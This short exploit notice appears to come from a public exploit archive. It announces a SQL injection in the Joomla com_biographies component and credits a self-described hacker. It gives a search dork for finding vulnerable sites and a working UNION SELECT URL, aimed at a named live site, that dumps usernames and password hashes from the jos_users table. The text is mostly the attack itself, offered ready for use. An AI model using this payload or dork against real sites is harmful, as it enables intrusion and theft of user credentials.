#-------------------------------------------------------- #Joomla (com_biographies) SQL injection Vulnerability #-------------------------------------------------------- #Discovered By: Snakespc ALGERIAN HaCkEr #Mail: snakespc@gmail.com #site:anti-sec.info/vb/index.php #------------------------------------------------------- #Dork:inurl"com_biographies" #Exploit: #-------- #Demo: #http://www.archivesofrss.org/index.php?option=com_biographies&task=showFile&biobookid=-5+union+all+select+1,2,3,concat(username,0x3a,password)+from+jos_users--